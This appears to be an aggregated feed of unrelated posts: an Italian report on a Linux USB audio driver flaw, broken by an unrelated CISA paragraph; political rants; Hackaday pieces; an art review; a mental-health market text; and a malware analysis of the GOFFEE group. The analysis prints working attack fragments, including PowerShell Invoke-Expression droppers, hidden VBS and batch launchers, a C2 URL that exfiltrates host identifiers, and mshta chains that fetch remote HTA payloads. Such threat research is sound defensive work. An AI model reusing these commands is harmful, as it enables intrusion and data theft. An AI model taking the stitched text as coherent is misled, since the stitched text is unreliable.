Una vulnerabilità critica nel driver audio USB di Linux è stata recentemente risolta grazie a una patch sviluppata da Takashi Iwai di SUSE. Il problema, identificato nel sottosistema audio del kernel, permetteva letture di memoria fuori dai limiti (out-of-bounds), esponendo i sistemi a rischi significativi. In scenari pratici, un aggressore con accesso fisico al dispositivo avrebbe potuto utilizzare un’apparecchiatura USB appositamente realizzata per compromettere l’integrità del sistema.

Ieri la Cybersecurity and Infrastructure Security Agency (CISA) ha aggiunto due importanti
vulnerabilità del kernel Linux al suo catalogo Known Exploited Vulnerabilities (KEV), confermando che entrambe le falle vengono attivamente sfruttate in attacchi mirati.

Nel dettaglio, la vulnerabilità risiedeva nella gestione dei descrittori USB da parte del driver. Quando un dispositivo audio USB forniva un descrittore con un valore bLength inferiore alla dimensione minima attesa, il driver assumeva comunque la validità del dato e procedeva alla lettura di campi successivi come ID di clock o array di pin. Questa assunzione errata apriva la possibilità di leggere dati fuori dal buffer originariamente allocato.

Le conseguenze di un exploit riuscito potevano essere gravi. Un attacco sfruttando questa falla avrebbe potuto portare alla divulgazione di dati sensibili presenti nella memoria del kernel — come puntatori o informazioni utente — oppure causare crash di sistema tramite accessi a indirizzi non validi. Nei casi peggiori, un attore malevolo avrebbe potuto eseguire codice arbitrario con privilegi elevati, compromettendo completamente il dispositivo.

La patch correttiva, integrata nel kernel Linux il 14 dicembre 2024 da Greg Kroah-Hartman della Linux Foundation, ha introdotto controlli più rigidi sui descrittori ricevuti dai dispositivi USB. Questa modifica incrementa la resilienza del driver audio, prevenendo tentativi di exploit e migliorando al contempo la stabilità generale del sistema per tutti gli utenti che utilizzano periferiche audio USB.

L’incidente sottolinea ancora una volta quanto sia cruciale mantenere aggiornato il proprio kernel e monitorare le vulnerabilità nei sottosistemi meno evidenti come quello audio. Sebbene un attacco di questo tipo richieda accesso fisico al dispositivo, la presenza della vulnerabilità rappresentava comunque una minaccia concreta, soprattutto in contesti come data center, postazioni pubbliche o ambienti aziendali ad alta sicurezza.

L'articolo Grave falla nel driver audio USB Linux: rischio di esecuzione di codice, ecco la patch proviene da il blog della sicurezza informatica.

Il presidente degli Stati Uniti Donald Trump ha firmato un ordine esecutivo che elimina le restrizioni federali sulla quantità d’acqua utilizzabile dai soffioni delle docce. La misura cancella i limiti introdotti dalle amministrazioni Obama e Biden, che fissavano il massimo flusso a nove litri al minuto per favorire il risparmio idrico. Nel testo si legge che gli americani "pagano la propria acqua e devono essere liberi di scegliere come fare la doccia, senza intrusioni federali".

Ma non erano i woke quelli che, con tutti i problemi seri che ci sono, stavano a preoccuparsi di cose futili come l'identità di genere, il binarismo sessuale, ecc.?

E questo fa un ordine esecutivo per farsi la doccia con tanta acqua?

agi.it/estero/news/2025-04-10/…

Around these parts, we generally celebrate clever hacks that let you do more with less. So if somebody wrote in to tell us how they used multiplexing to drive the front panel of their latest gadget with fewer pins on the microcontroller than would normally be required, we’d be all over it. But what if that same hack ended up leading to a common failure in a piece of consumer hardware?

As [Jim] recently found out, that’s precisely what seems to be ailing the Meaco Arete dehumidifier. When his stopped working, some Internet searching uncovered the cause of the failure: if a segment in the cheap LED display dies and shorts out, the multiplexing scheme used to interface with the front panel essentially reads that as a stuck button and causes the microcontroller to lock up. He passed the info along to us as a cautionary tale of how over-optimization can come with a hidden cost down the line.

Judging by the thread from the Badcaps forum, the problem was identified last summer. But unless you had this particular dehumidifier and went searching for it, it’s not the kind of thing that you’d otherwise run into. The users start by going through the normal diagnostic steps, but come up short (no pun intended).
Given its simplicity, the front panel PCB was not an obvious failure point.
Eventually, user [CG2] resorts to buzzing out all the connections to the two digit seven-segment LED display on the front panel, and finds a dead short on one of the segments. After removing the display, the dehumidifier sprung back to life and everything worked as expected. It wasn’t hard to identify a suitable replacement display on AliExpress, and swapping it out brought the appliance back up to full functionality.

Now to be fair, a shorted out component is likely to cause havoc wherever it might be in the circuit, and as such perhaps it’s the lowest-bidder LED display with the unusually high failure rate that’s really to blame here. But it’s also more likely you’d interpret a dark display as a symptom of the problem rather than the cause, making this a particularly tricky failure to identify.

In any event, judging by how many people seem to be having the same problem, and the fact that there’s now an iFixit guide on how to replace the shorted display, it seems like this particular product was cost-optimized just a bit too far.

hackaday.com/2025/04/10/clever…

GOFFEE is a threat actor that first came to our attention in early 2022. Since then, we have observed malicious activities targeting exclusively entities located in the Russian Federation, leveraging spear phishing emails with a malicious attachment. Starting in May 2022 and up until summer of 2023, GOFFEE deployed modified Owowa (malicious IIS module) in their attacks. As of 2024, GOFFEE started to deploy patched malicious instances of explorer.exe via spear phishing.

During the second half of 2024, GOFFEE continued to launch targeted attacks against organizations in Russia, utilizing PowerTaskel, a non-public Mythic agent written in PowerShell, and introducing a new implant that we dubbed “PowerModul”. The targeted sectors included media and telecommunications, construction, government entities, and energy companies.

This report in a nutshell:

• GOFFEE updated distribution schemes.
• A previously undescribed implant dubbed PowerModul was introduced.
• GOFFEE is increasingly abandoning the use of PowerTaskel in favor of a binary Mythic agent for lateral movement.

For more information, please contact: intelreports@kaspersky.com

Technical details

Initial infection

Currently, several infection schemes are being used at the same time. The starting point is typically a phishing email with a malicious attachment, but the schemes diverge slightly from there. We will review two of them relevant at the time of the research.

The first infection scheme uses a RAR archive with an executable file masquerading as a document. In some cases, the file name uses a double extension, such as “.pdf.exe” or “.doc.exe”. When the user clicks the executable file, a decoy document is downloaded from the C2 and opened, while malicious activity is carried out in parallel.

Example of decoy document

The file itself is a Windows system file (explorer.exe or xpsrchvw.exe), with part of its code patched with a malicious shellcode. The shellcode is similar to what we saw in earlier attacks, but in addition contains an obfuscated Mythic agent, which immediately begins communicating with the command-and-control (C2) server.

Malware execution flow v1

In the second case, the RAR archive contains a Microsoft Office document with a macro that serves as a dropper.

Malware execution flow v2

Malicious document with a macro

When a document is opened, scrambled text and a warning image with the message, “This document was created in an earlier version of Microsoft Office Word. For Microsoft Office Word to display the contents correctly, click ‘Enable Content'”, are shown. Clicking “Enable Content” activates a macro that hides the warning image and restores the text through a normal character replacement operation. Additionally, the macro creates two files in the user’s current folder: an HTA and a PowerShell file, and writes the HTA into the registry using the “LOAD” registry value of the “HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows” registry key.
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows
"LOAD"="C:\Users\<USER_NAME>\UserCache.ini.hta"
Although the macro itself does not start anything or create new processes, the programs listed in the “LOAD” value of the registry key are run automatically for the currently logged-on user.

UserCache.ini.hta content

The malicious HTA runs a PowerShell script (PowerModul), but not directly. Instead, it first uses cmd.exe and output redirection to drop a JavaScript file named “UserCacheHelper.lnk.js” onto the disk, and then executes it. Only then does the dropped JavaScript run PowerModul:
cmd.exe /c if not exist "C:\Users\user\UserCacheHelper.lnk.js" echo var objService = GetObject("winmgmts:\\\\.\\root\\cimv2");var objStartup = objService.Get("Win32_ProcessStartup");var objConfig = objStartup.SpawnInstance_();objConfig.ShowWindow = 0;var processClass = objService.Get("Win32_Process");var command = "powershell.exe -c \"$raw= Get-Content C:\\Users\\user\\UserCache.ini;Invoke-Expression $raw\"";var result = processClass.Create(command, null, objConfig, 0); > C:\Users\user\UserCacheHelper.lnk.js
It is worth noting that “UserCache.ini.hta” and “UserCacheHelper.lnk.js” contain strings with full paths to the files, including the local user’s name, instead of environment variables. As a result, the control keys, as well as the file sizes, will vary depending on the current user’s name.

UserCacheHelper.lnk.js content

The “UserCacheHelper.lnk.js” file launches a PowerShell file named “UserCache.ini”, dropped by the initial macro. This file contains encoded PowerModul.

PowerModul

PowerModul is a PowerShell script capable of receiving and executing additional PowerShell scripts from the C2 server. The first instances of this implant’s usage were detected at the beginning of 2024. Initially, it was used to download and launch the PowerTaskel implant, and was considered a relatively minor component for launching PowerTaskel. However, its use of a unique protocol, distinct payload types, and a C2 server different from PowerTaskel’s led us to classify it as a separate family.

UserCache.ini content

In the scheme being described, the PowerModul code is embedded in the “UserCache.ini” file as a Base64-encoded string. The beginning and end of the decoded script are shown in the images below, while the middle section contains a copy of the HTA file, as well as code responsible for dropping the HTA file onto the disk, writing it to the registry, and hiding the file by changing its attributes to “Hidden”. Essentially, this code replicates part of the functionality of the VBA macro found in the Word document, except for file hiding, which was not implemented in VBA.

Beginning of PowerModul

End of PowerModul

When accessing the C2, PowerModul appends an infected system identifier string to the C2 URL, consisting of the computer name, username, and disk serial number, separated with underscores:
hxxp://62.113.114[.]117/api/texts/{computer_name}_{username}_{serial_number}
The response from the C2 is in XML format, complete with scripts encoded in Base64:
HTTP/1.1 200 OK
Server: nginx/1.18.0
Content-Type: text/plain
Content-Length: 35373
Connection: keep-alive

<Configs>
<Config>
<Module>ZnVuY3Rpb24gQ3JlYXRlVkJTRmlsZSgkYkJkcmxzRCwgJGlMc1FybVQsIC....==</Module>
<CountRuns>250</CountRuns>
<Interval>1</Interval>
</Config>
<Config>
<Module>ZnVuY3Rpb24gUnVuKCl7DQokaWQgPSBnZXQtcmFuZG9tDQokY29kZSA9I...</Module>
There is an additional, previously undescribed function in PowerModul, named “OfflineWorker()”. It decodes a predefined string and executes its contents. In the instance shown in the screenshots above, the string to be decoded is empty, and therefore, nothing is executed. However, we have observed cases where the string contained content. An example of the OfflineWorker() function containing the FlashFileGrabber data stealing tool code is shown below:
function OfflineWorker() {
try{
$___offlineFlash = 'ZnVuY3Rpb24gUnVuKCl7DQokaWQgPSBnZXQtcmFuZG9tDQokY29kZSA9IE…….=';

if($___offlineFlash -ne ''){
$___flashOfflineDecoded = FromBase64 $___offlineFlash;
Invoke-Expression($___flashOfflineDecoded);
}
}
catch{}
}
The payloads used by PowerModul include the PowerTaskel, FlashFileGrabber, and USB Worm tools.

FlashFileGrabber

As its name suggests, FlashFileGrabber is designed to steal files from removable media, such as flash drives. We have identified two variants: FlashFileGrabber and FlashFileGrabberOffline.

FlashFileGrabberOffline main routine

FlashFileGrabberOffline searches removable media for files with specific extensions, and when found, copies them to the local disk. To accomplish this, it creates a series of subdirectories in the TEMP folder, following the template “%TEMP%\CacheStore\connect\<VolumeSerialNumber>\”. The folder names “CacheStore” and “connect” are hardcoded within the script. Examples of such paths are provided below:
%TEMP%\CacheStore\connect\62431103\2024\some.pdf
%TEMP%\CacheStore\connect\62431103\Documents\some.docx
%TEMP%\CacheStore\connect\62431103\attachment.jpg
%TEMP%\CacheStore\connect\6c1d1372\Print\resume.docx
Additionally, a file named “ftree.db” is created at the path specified in the template, which stores metadata for the copied files, including the full path to the original file, its size, and dates of last access and modification. Furthermore, in the “%AppData%” folder, the “internal_profiles.db” file is created, storing the MD5 sums of the aforementioned metadata. This allows the malware to avoid copying the same files more than once:
%TEMP%\CacheStore\connect\<VolumeSerialNumber>\ftree.db
%AppData%\internal_profiles.db
The list of file extensions of interest is as follows:

FlashFileGrabber largely duplicates the functionality of FlashFileGrabberOffline, but with one key difference: it is capable of sending files to the C2 server.

FlashFileGrabber’s routines

USB Worm

USB Worm is capable of infecting removable media with a copy of PowerModul. To achieve this, the worm renames the files on the removable disk with a random name, retaining their original extension, and assigns them the “Hidden” file attribute. The “UserCache.ini” file, which contains PowerModul, is then copied to the folder with the original file.

USB Worm main routine

Additionally, the worm creates hidden VBS and batch files to launch PowerModul and open a decoy document.

CreateVBSFile() and CreateBatFile() functions

Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run Chr(34) & ".\zermndzg.bat" & Chr(34), 0, False
WshShell.Run Chr(34) & ".\zermndzg.docx" & Chr(34), 1, False
Set WshShell = Nothing
Example of the contents of a malicious VBS
powershell -exec bypass -windowstyle hidden -nop -c "$raw= [io.file]::ReadAllText(""".\UserCache.ini"""); iex $raw;"
Example of the contents of a malicious batch file

A shortcut is also created with the original name of the decoy document, which, when launched, executes the VBS file.

CreateShortcutForFile() function

To disguise the shortcut, the worm assigns an icon from the shell32.dll library, depending on the extension of the original file. The worm limits the number of documents replaced with shortcuts to five, selecting only the most recently accessed files by sorting them according to their LastAccessTime attribute.

System infection scheme via removable media

PowerTaskel

We have dubbed the non-public PowerShell Mythic agent delivered via a mail-based infection chain since early 2023, as PowerTaskel. This implant possesses only two primary capabilities: sending information about the targeted environment to a C2 server in the form of a “checkin” message, and executing arbitrary PowerShell scripts and commands received from the C2 server as “tasks” in response to “get_tasking” requests from the implant. The request payloads are PowerShell objects that are serialized to XML, encoded using XOR with a sample-specific 1-byte key, and then converted to Base64.

Based on the naming and ordering of the configuration parameters, it is likely that PowerTaskel is derived from the open-source Medusa Mythic agent, which was originally written in Python.

Comparison of Medusa and PowerTaskel configuration code

Comparison of Medusa and PowerTaskel “checkin” function code

PowerTaskel is a fully functional agent capable of executing commands and PowerShell scripts, which expand its capabilities to downloading and uploading files, running processes, etc. However, its functionality is often insufficient due to specific aspects of PowerShell usage, prompting the group to switch to a custom binary Mythic agent. To achieve this, PowerTaskel loads the Mythic agent from the C2 server, injects it into its own process memory, and runs it in a separate thread. In this scenario, the Mythic agent is present as a self-configuring x32/x64 shellcode. The method of injecting and loading the Mythic agent shellcode is described in more detail in the “Lateral Movement” section.

In at least one instance, PowerTaskel received a script containing a FolderFileGrabber component as a task. FolderFileGrabber largely replicates the functionality of FlashFileGrabber, with one key difference: it can grab files from remote systems via a hardcoded network path using the SMB protocol. The PowerShell cmdlet “New-SmbMapping” is used to access remote system resources, enabling successful retrieval of the desired files.

Lateral movement

Following system infection, if the user account permissions allow it, PowerTaskel performs several tasks to elevate its privileges to the System level. To achieve this, PowerTaskel utilizes the PsExec utility, which is part of the Sysinternals suite. The PsExec utility is dropped into the current directory where PowerTaskel is located and is used to execute mshta.exe with system privileges, passing a URL as an argument.

The images below depict two tasks that PowerTaskel executes with its C2 server. The first task checks for the presence of the file “ntuser.exe” in the %ProgramData% directory, and if it is not found, downloads it from the C2 server. The second task runs mshta.exe via ntuser.exe, which is actually a renamed PsExec utility.

Getting “ntuser.exe”

The “ntuser.exe” executable running “mshta.exe”

The next image illustrates an example of the execution flow of various scripts and commands started with the privilege elevation procedure. The executable file “1cv9.exe” is a renamed PsExec utility, and the argument “-s” specifies that the process it launches should run under the System account. The launched program “mshta.exe” accepts a URL as an argument, which points to an HTA file containing malicious, obfuscated JScript. The HTA file is cached and saved to the InetCache folder. This JScript creates two files, “desktop.js” and “user.txt”, on the disk using the “echo” console command with output redirection to a file, and then executes desktop.js via cscript.exe. The desktop.js file, in turn, launches the interpreter with a script on the command line, which reads the contents of user.txt and executes it. As evident from the contents passed to the “echo” command, user.txt is another PowerShell script whose task is to extract a payload from a hardcoded address and execute it. In this case, the payload is PowerTaskel, which now runs with the elevated privileges.

Example of execution flow on an infected system

Once launched, PowerTaskel interacts with its C2 server and executes standard commands to gather information about the system and environment. Notably, the launch of csc.exe (Visual C# Command Line Compiler) indicates that PowerTaskel has received a task to load a shellcode, which it accomplishes using an auxiliary DLL. The primary function of this DLL is to copy the shellcode into allocated memory. In our case, the shellcode is self-configuring code for the binary Mythic agent.

The final line of the execution flow (“hxxp://192.168.1[.]2:5985/wsman”) reveals a call to the WinRM (Microsoft Windows Remote Management) service, located on a remote host on the local network, via the loaded Mythic agent. A specific User-Agent header value, “Ruby WinRM Client”, is used to access the WinRM service.

HTTP header for WinRM request

The WinRM service is actively utilized by GOFFEE for network distribution purposes. Typically, this involves launching the mshta.exe utility on the remote host with a URL as an argument. The following examples illustrate the execution chains observed on remote hosts:
wmiprvse.exe -secured -Embedding
-> cmd.exe /C mshta.exe https://<domain>.com/<word>/<word>/<word>/<word>/<word>.hta

wsmprovhost.exe
-> mshta.exe https://<domain>.com/<word>/<word>/<word>/<word>/<word>.hta

wmiprvse.exe -secured -Embedding
-> cmd.exe /Q /c powershell.exe mshta.exe https://<domain>.com/<word>/<word>/<word>/<word>/<word>.hta

wmiprvse.exe -secured -Embedding
-> powershell.exe /C mshta.exe https://<domain>.com/<word>/<word>/<word>/<word>/<word>.hta
Recently, we have observed that GOFFEE is increasingly abandoning the use of PowerTaskel in favor of the binary Mythic agent during lateral movement.

Mythic agent HTA

The mshta.exe utility is still employed to launch the binary Mythic agent, with a URL passed as an argument. However, the payload contents for the passed URL differ from the traditional HTA format. It is relatively large, approximately 180 kilobytes, and is characterized as a polyglot file, which is a type of file that can be validly interpreted in multiple formats. The shellcode containing the Mythic agent is located at the beginning of the file and occupies approximately 80% of its size. It is followed by two Base64-encoded PowerShell scripts, separated by a regular line break, and finally, the HTA file itself.

Polyglot payload

When the mshta.exe utility downloads the aforementioned payload, it interprets it as an HTA file and transfers control to an obfuscated JScript embedded within the HTA section of the polyglot file. The script first determines the argument used to launch the mshta.exe utility, whether it was a URL or a path to a local file. If a URL was used as the argument, the script searches for the original HTA file in the InetCache folder, where the system cached the HTA file during download. To do this, the script iterates through all files in the cache folder and checks their contents for the presence of a specific magic string.

Deobfuscated JScript from the HTA section of the payload

If an HTA file is found on the disk, the script drops two files, “settings.js” and “settings.ps1”, using the “echo” command, and then runs settings.js with additional command-line arguments. The script then sets a timer for 10 seconds, after which the dropped files will be deleted.

Deobfuscated “settings.js”

The running settings.js script accepts three command-line arguments: the path to powershell.exe, the path to the HTA file, and the string “Shell.Application”. These received arguments are used to populate a PowerShell script, the contents of which are then passed to the powershell.exe command line.
powershell.exe -c "$INbqDKHp = \"C:\\\\Users\\\\[username]\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\INetCache\\\\IE\\\\duplicate````[1````].hta\";$OdfUfjp = get-content $env:USERPROFILE\\settings.ps1;$KWfWXqek=1;Invoke-Expression $OdfUfjp;$KWfWXqek=2;Invoke-Expression $OdfUfjp;$KWfWXqek=3;Invoke-Expression $OdfUfjp;"
The script passed to the PowerShell interpreter declares two variables: “$INbqDKHp”, which stores the path to the HTA file, and “$KWfWXqek”, a counter. The script then reads the contents of “settings.ps1” and executes it three times, passing the path to the HTA file and the counter as arguments, and incrementing the value of the “$KWfWXqek” variable by 1 each time.

Deobfuscated “settings.ps1”

During each execution, the “settings.ps1” script reads the contents of the HTA file, splits it into lines, and identifies Base64-encoded scripts. To detect these scripts, it first locates the line containing the HTA application tag by searching for the substring “<HTA:APPLICATION”. The three lines preceding this tag contain Base64-encoded scripts. Depending on the value of the “$KWfWXqek” counter, the script executes the corresponding Base64-encoded script.
The first two scripts are used to declare auxiliary functions, including compiling a helper DLL, which is necessary for executing the shellcode. The third script is responsible for allocating memory, loading the shellcode from the HTA file (whose path is retrieved from the previously defined “$INbqDKHp” variable), and transferring control to the loaded shellcode, which is the self-configuring code of the Mythic agent.

Victims

According to our telemetry, the identified targets of the malicious activities described in this article are located in Russia, with observed activity spanning from July 2024 to December 2024. The targeted industries are diverse, encompassing organizations in the mass media and telecommunications sectors, construction, government entities, and energy companies.

Attribution

In this campaign, the attacker utilized PowerTaskel, which had previously been linked to the GOFFEE group. Additionally, HTA files and various scripts were employed in the infection chain.

The malicious executable attached to the spear phishing email is a patched version of explorer.exe, similar to what we observed in GOFFEE’s attacks earlier in 2024, and contains shellcode that is very similar to the one previously used by GOFFEE.

Considering the same victimology, we can attribute this campaign to GOFFEE with a high degree of confidence.

Conclusions

Despite using similar tools and techniques, GOFFEE introduced several notable changes in this campaign.

For the first time, they employed Word documents with malicious VBA scripts for initial infection. Additionally, GOFFEE utilized a new PowerShell script downloader, PowerModul, to download PowerTaskel, FlashFileGrabber, and USB Worm. They also began using the binary Mythic agent, and likely developed their own implementations in PowerShell and C.

While GOFFEE continues to refine their existing tools and introduce new ones, these changes are not significant enough to suggest that they can be confused with another actor.

securelist.com/goffee-apt-new-…

Sono stato a vedere la mostra Genealogies di Thomas Schütte, allestita dalla Pinault Collection a Venezia nella sede di Punta della Dogana. Un’esposizione che attraversa decenni di produzione, materiali eterogenei e registri espressivi che vanno dall’ironia alla gravità. L’essere umano è al centro: corpi, volti, figure. Ma sempre sfuggenti. Mai rassicuranti.

Il lavoro di Schütte sul corpo mi ha colpito in particolare per la sua capacità di destabilizzare. Le figure non aderiscono a un codice normativo: sono deformate, abbozzate, eccessive, assenti. I “Fratelli” presentano espressioni contratte, fisse, ambigue. Nascono da uno studio sui busti romani e sono ispirati dallo scandalo Mani Pulite. Mi hanno molto colpito: mi sono sentito osservato e inquietato da queste figure mute, statiche, eppure piene di tensione.

“Vater Staat”, imponente e trasandato con la sua vestaglia, è lo Stato ridotto a una goffa caricatura. Un padre vecchio, immobile, incapace eppure enorme. E proprio da questa immobilità emerge una strana forma di potenza simbolica. Lo sguardo dell’artista, in questi casi, è acuto, critico, capace di riflettere in modo ironico e cupo sul potere e sull’identità.

Il corpo qui non è un’icona, ma un campo di tensioni. Sospeso tra fallimento, desiderio e memoria. La mia passione per l’arte queer mi ha fatto pensare al corpo come indefinito, che scivola via dalla norma. Anche se questa lettura è del tutto personale e soggettiva, resta però chiaro che questi corpi non si lasciano facilmente decifrare, né tantomeno glorificare.

La rappresentazione femminile, invece, mi ha coinvolto meno. Pur essendo varia e apparentemente sovversiva (le Donne piangenti, le donne distese deformate, la Geisha attempata), mi è sembrata spesso meno profonda e meno incisiva rispetto al lavoro fatto sui corpi e sui volti maschili. Un po’ come se l’artista stesse cercando un modo alternativo di raffigurare le donne, ma da una posizione inevitabilmente maschile, senza riuscire davvero a costruirne uno alternativo e senza scardinarne lo sguardo.

Durante la visita, una sorpresa: un’immagine bellissima e inattesa. Alcune opere erano collocate in cima al torrione, con il belvedere sulla laguna. Il cielo di Venezia, la luce dell’acqua, il vento: un momento sospeso. E anche lì, in quell’aria, il corpo sembrava sfuggire, come un fantasma.

@Arte e Cultura @Cultura
#arte #venezia #puntadelladogana #ThomasSchutte

In questi giorni caotici in cui le notizie da oltreoceano si susseguono come proiettili di una mitragliatrice, non riesco a non pensare ad un aspetto che rischia di passare inosservato, schiacciato dal peso dei gravi effetti di Trump sul mondo:

I SOSTENITORI DI TRUMP IN ITALIA.

Ne conosco diversi, tanti, troppi: quelli che già da prima del voto sostenevano che Trump fosse l'unica scelta possibile, visto che Biden era chiaramente uscito di senno e, successivamente, "ma chi voti? Voti la Harris? Una sciacquetta senza nessuna credibilità".

C'era chi sosteneva che la nuova venuta di Trump avrebbe finalmente portato la pace nel mondo, un mondo più tranquillo dopo che quel "guerrafondaio di Biden" aveva fatto di tutto per rovinarlo.

"E poi vuoi mettere l'economia?" Sicuramente Trump, un affarista nato, avrebbe fatto risorgere i mercati mettendo al contempo la Cina al suo posto, e "vedrai come risorge l'occidente!"

Oggi, in un mondo normale, gli italiani che sostenevano tutto questo non dovrebbero uscire di casa per la vergogna. Io al loro posto non mi farei più vedere, cambierei cognome, nasconderei la testa sotto la sabbia lasciando le terga al vento, pur di non dover parlare più con nessuno: perché la figura di merda colossale che starei facendo non sarebbe più riparabile.

E invece no.

Li trovi ancora a scrivere blog, articoli, cazzate dai titoli simili a questo: "Dazi USA a Taiwan: suicidio economico o strategia geniale?".

A qualunque persona con due neuroni attivi pare ormai chiaro che l'unico veramente fuori di testa sia proprio Trump, più che Biden, che gli Stati Uniti di sono ormai una barzelletta, che il consigliere economico di trump, Peter Navarro, sia uno che deve essersi fatto di qualche droga tagliata male, ma i "nostri" no, a loro non la si fa: stoici, continuano ad arrampicarsi sugli specchi. Trump è un grande statista, è tutto calcolato, "almeno tolgono l'ideologia woke", Musk un grande imprenditore (praticamente un filantropo); insomma, tutto normale. E' ormai chiarissimo che l'operato di Trump sia sovrapponibile ai desideri di Punti per l'occidente. Io qualche domandina me la farei e qualche risposta me la darei.

A me pare evidente che, se anche per il mondo ci potrebbe essere qualche speranza, l'Italia è già bella che spacciata: perché le persone così sono ormai cresciute e diventate abbastanza da formare una massa critica. Come si può essere così ottusi?

Vi prego, datemi un punto di vista diverso dal mio, fatemi cambiare idea.

#trump #dazi #europa #usa #italia #taiwan #harris #musk #destra #trumpismo #Italia #trumpism #guerradeidazi #tariffs #russia

The tech press has been full of announcements over the last day or two regarding GPMI. It’s a new standard with the backing of a range of Chinese hardware companies, for a high-speed digital video interface to rival HDMI. The Chinese semiconductor company HiSilicon have a whitepaper on the subject (Chinese language, Google Translate link), promising a tremendously higher data rate than HDMI, power delivery well exceeding that of USB-C, and interestingly, bi-directional data transfer. Is HDMI dead? Probably not, but the next few years will bring us some interesting hardware as they respond to this upstart.

Reading through pages of marketing from all over the web on this topic, it appears to be an early part of the push for 8k video content. There’s a small part of us that wonders just how far we can push display resolution beyond that of our eyes without it becoming just a marketing gimmick, but it is true to say that there is demand for higher-bandwidth interfaces. Reports mention two plug styles: a GPMI-specific one and a USB-C one. We expect the latter to naturally dominate. In terms of adoption, though, and whether users might find themselves left behind with the wrong interface, we would expect that far from needing to buy new equipment, we’ll find that support comes gradually with fallback to existing standards such as DisplayPort over USB-C, such that we hardly notice the transition.

Nearly a decade ago we marked the passing of VGA. We don’t expect to be doing the same for HDMI any time soon in the light of GPMI.

hackaday.com/2025/04/10/everyo…

Berlin, Germany - Germany is increasingly prioritizing the treatment of neuropsychiatric disorders through innovative research, technological advancements, and policy changes. Here's a snapshot of recent developments:

Increased Prevalence Driving Market Growth: The

]German market for neuropsychiatric disorder treatment[/url] is experiencing significant growth, with an anticipated CAGR of over 10% between 2025 and 2035. This surge is fueled by a rising prevalence of conditions like depression, anxiety, and schizophrenia, affecting over 12 million individuals in Germany. Consequently, mental health is receiving greater attention in national health policies, leading to increased funding for research and treatment.

Germany Neuropsychiatric Disorders Treatment Market size

Digital Health and Telepsychiatry on the Rise: Technological advancements are transforming the landscape of mental healthcare in Germany. Telepsychiatry has gained considerable traction, particularly in rural areas, improving access to specialized care through remote consultations. Since the onset of the COVID-19 pandemic, the use of telepsychiatry has reportedly increased by over 40%, indicating a shift towards more accessible and convenient treatment options.

Personalized Treatment and Biomarker Research: There's a growing emphasis on personalized treatment approaches for neuropsychiatric disorders in Germany. This focus is driving research into biomarkers that can help tailor therapies to individual patient needs, potentially leading to more effective outcomes.

Industry Collaborations and Investments: Pharmaceutical and biotech companies in Germany are actively investing in the development of novel treatments for various neuropsychiatric conditions. For instance, in 2021, Boehringer Ingelheim partnered with the Lieber Institute for Brain Development to develop centrally acting COMT inhibitors for cognitive deficits in disorders like schizophrenia. More recently, in April 2024, the German mental health platform neurocare secured €16 million in funding to expand its digital therapy platform for a range of psychological and neurological conditions.

Focus on Rare Neurological Disorders: Germany is also making significant strides in researching and treating rare neurological disorders. The establishment of a new site of the German Center for Neurodegenerative Diseases (DZNE) in Ulm signifies a long-term commitment to funding research into conditions like ALS, frontotemporal dementia, and Huntington's disease. This site will focus on translational research, aiming to rapidly convert scientific findings into clinical applications.

Nanotechnology for Brain Disorders: Researchers like Danijela Gregurec are pioneering innovative approaches using functional nanomaterials that can be introduced into the brain to combat mental illnesses such as dementia, Alzheimer's, and panic disorders, showcasing the interdisciplinary nature of research in this field.

Addressing Mental Health in Children and Adolescents: Recognizing the increasing rates of mental health issues in younger populations, Germany opened the German Center for Prevention Research in Mental Health (DZPP) in Würzburg in April 2024. This interdisciplinary center focuses on developing and evaluating prevention programs for children and adolescents, bridging the gap between research and practical care.

Challenges in Refugee Mental Healthcare: Despite overall progress, concerns have been raised regarding cuts to mental health services for asylum seekers and refugees. Specialist clinics like Mosaik in Leipzig are facing significant budget reductions in 2025, raising fears about the impact on vulnerable individuals who have experienced trauma.

National Mental Health Surveillance: The Robert Koch Institute (RKI) is actively developing a national Mental Health Surveillance (MHS) system to continuously monitor the mental health of the German population. This initiative aims to provide regular data on key indicators, enabling informed public health responses.

Focus on Workplace Mental Health: The German Center for Mental Health (DZPG) is emphasizing the role of employers in promoting mental well-being. With mental illness being a significant cause of work absences, the DZPG advocates for more comprehensive and targeted workplace mental health initiatives.

Overall, Germany demonstrates a strong and evolving commitment to understanding and treating neuropsychiatric disorders through diverse research endeavors, technological integration, and increasing policy attention. While challenges remain in specific areas, the trend indicates a growing awareness and proactive approach to addressing the complex needs of individuals living with these conditions.